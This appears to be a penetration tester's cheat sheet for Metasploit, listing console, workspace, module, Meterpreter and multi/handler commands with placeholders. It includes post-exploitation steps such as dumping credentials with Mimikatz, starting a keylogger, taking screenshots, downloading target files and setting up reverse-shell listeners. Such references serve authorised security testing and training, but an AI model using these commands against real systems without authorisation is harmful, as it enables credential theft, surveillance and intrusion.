Metasploit References

General

  • Start Without Banner: sudo msfconsole -q

  • Start With Setup Script: sudo msfconsole -r <setup_script>.rc

  • Help and Show Parameters: show -h

  • Return to Prompt: back

  • Return to Previous Module: previous

  • Activate Module: use <module_name>

  • Set/Remove Global Options: setg or unsetg

  • Display Discovered Hosts: hosts

  • Execute Nmap: db_nmap <host> <flag> <flag>

  • Search Modules: search type:<module_type> name:<module_name>

    • search type:auxiliary name:smb

  • Generate msfvenom Payload: generate -f <format> -x <file_to_inject> -o <new_output_file>

  • Background Current Session: background

  • List Available Sessions: sessions -l

  • Foreground Specified Session: sessions -i <#>

  • View Running Background Jobs: jobs

  • Foreground Background Job: jobs -i <#>

  • Display Advanced Options: show advanced

  • Encode Second Stage of Staged Payload: set EnableStageEncoding true

  • Specify Encoder: set StageEncoder <option>

  • Configure Auto Run on Connection: set AutoRunScript <script_to_run>

  • List Available Transports: transport list

  • Add New Transport Protocol to Current Session: transport add -t <transport_protocol_to_add> -l <local_IP_address> -p <local_port>

    • Initialize Multi Handler for New Transport Request: use multi/handler

      • Set new Transport Protocol (Payload Directory): set payload <transport_protocol_equivalent>

    • Change Newly-Created Transport Mode: transport next

Workspaces

  • List Available Workspaces: workspace

  • Change Workspace: workspace <workspace_name>

  • Add Workspace: workspace -a <workspace_name>

  • Delete Workspace: workspace -d <workspace_name>

Database Queries

  • Display Scan Results: services

  • Filter Previous Scan Results: services -<flag> <search_criteria>

    • Show Hosts w/Specified Port: services -p <port>

    • Show Services Options: services -h

  • Retrieve Successful Logon Attempts/Credentials: creds

Modules

  • Invoke/Activate Module: use <module_name>

  • Get Information on Invoked Module: info

  • Display Required/Optional Options: show options

  • Search Database and Add Results to Option: services -<flag> <search_criteria> --<option_to_populate>

    • services -p 445 --rhosts

  • Set/Remove Module Options: set or unset

  • Run Module: run

  • List Auxiliary Modules: show auxiliary

    • Structured as module type/os, vendor, app, or protocol/module name

  • Search Exploit Modules: search type:exploit <search>

  • Request Information on Module: info <path_to_module>

  • Use Exploit: use <exploit/…>

  • Show Available Payloads: show payloads

  • Set Payloads: set payload <path_to_payload>

  • Show Exploit/Payload Options: show options

  • Check/Verify if Target is Vulnerable (Requires Banner/Identifiable Data): check

  • Load Extensions in Active Session: load <extension>

    • PowerShell Extension: load powershell

    • Mimikatz: load kiwi

      • Get System Privileges: getsystem

      • Dump Credentials: creds_msv

Meterpreter Payloads

  • Search Meterpreter Payloads: search meterpreter type:payload

  • Show Available Meterpreter Commands: help

  • Get System Information: sysinfo

  • Get User Information: getuid

  • Upload File: upload <local_file_path> <target_file_path>

  • Download File: download <target_file_path> <local_file_path>

  • Get System Shell: shell

  • Take Screenshot: screenshot

  • Start Keylogger: keyscan_start

    • Requires migrating shell process to the targeted user context

    • Dump Keylogger Results: keyscan_dump

    • Stop Keylogger: keyscan_stop

  • Migrate Process: migrate <ps_ID>

  • View Running Processes: ps

Exploit Multi-Handlers

  • Initialize Multi Handler: use multi/handler

  • Set Payload Used/To Be Expected: set payload <payload>

    • Staged payloads are denoted by a forward slash (e.g. shell/reverse_tcp)

  • Show Options: show options

  • Initialize Multi Handler Listener: exploit

  • Initialize in Background: exploit -j
